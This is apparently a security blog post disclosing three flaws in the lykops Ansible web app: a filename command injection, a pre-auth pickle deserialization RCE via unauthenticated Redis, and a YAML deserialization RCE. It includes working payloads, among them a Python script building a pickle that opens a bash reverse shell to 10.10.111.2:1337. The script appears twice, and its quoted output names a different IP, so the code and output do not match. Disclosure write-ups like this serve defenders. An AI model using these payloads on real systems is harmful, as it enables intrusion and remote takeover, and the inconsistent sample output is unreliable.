lykops has multiple vulnerabilities

corresponding 0x00    intro

- github repo:https://github.com/lykops/lykops
- 121 stars and 65 forks til 2021/2/6





0x01    Post-Auth OS-command injection

lykops/library/utils/file.py#248 ->upload_file()





we got lykops/lykops/ansible/yaml.py#74,github link here

vuln param file comes from our HTTP Request in array of FILES[] 


So we can completely control the unsantized param, and cause a OS-cmd injection


  1. the corresponding route is ^ansible/yaml/import$, we can trigger this vuln by visiting it.
  2. Also, you can see that an exception will trigger twice invocations  of import_file(),which means a `sleep 5`  command will casue a delay of 10 second


POST /ansible/yaml/import/ 
Host: lykops
...

...
...;filename="test.txt$(sleep 5)"
...



0x02    Pre-Auth pickle Unserialized RCE via Unauthorized Redis

route of Login,is ^login.html,the corresponding implementation is Login->login function


Follow up get_userinfo , it is found that the user's login cache is retrieved from Redis.


Line 81, passed in user=adminuser Variable, we get it by searching the variable name globally adminuser The default value is lykops





Further, Redis uses String , in order to convert to Python Object , there must be a deserialization implementation. 
If The deserialization restriction is improper, there will be a vulnerability-what function does it use to deserialize? 


pickle.loads! this evil function! 

This get The implementation of, in the input parameter is fmt=obj When deserialization from Redis achieved in 字符串 ], and the deserialization function is actually used pickle.loads !

If you are not familiar with Python deserialization attacks, see python deserialization attacks from scratch This post.

The following figure shows a demo that uses deserialization to run commands in Python cmdline. 







So the script for generating the payload is as follows:

#!/usr/bin/env python3
import pickle
import os

class py():
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py()) 
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.1/1337 0>&1q\x01\x85q\x02Rq\x03.'

#!/usr/bin/env python3
import pickle
import os

class py():
  def __reduce__(self):
    return (os.system, ('bash -i >& /dev/tcp/10.10.111.2/1337 0>&1',))

payload = pickle.dumps(py()) 
# b'\x80\x03cposix\nsystem\nq\x00X)\x00\x00\x00bash -i >& /dev/tcp/10.10.111.1/1337 0>&1q\x01\x85q\x02Rq\x03.'











0x03    Post-Auth YAML Unserialized RCE

Firstly, people should know that unproperly use yaml.load
will cause Python Arbitrary Object  Loads, which in most cases means a RCE.

To find original tutorials, visit the tutotials of https://pyyaml.org/wiki/PyYAMLDocumentation#Tutorial

Loading YAML

Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function. Check the yaml.safe_load function though.


Searching for yaml.load and got this , library/utils/yaml.py#27 , github link here





























invocation is from yaml_loader (), which is trigged in upload function

!!python/object/new:os.system ["sleep 2"]

So we got an Post-Auth RCE
























the sorce is in  library/utils/file.pygithub link here










评论

此博客中的热门博文

Thinksaas has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

MKCMS V6.2 has mutilple vulnerabilities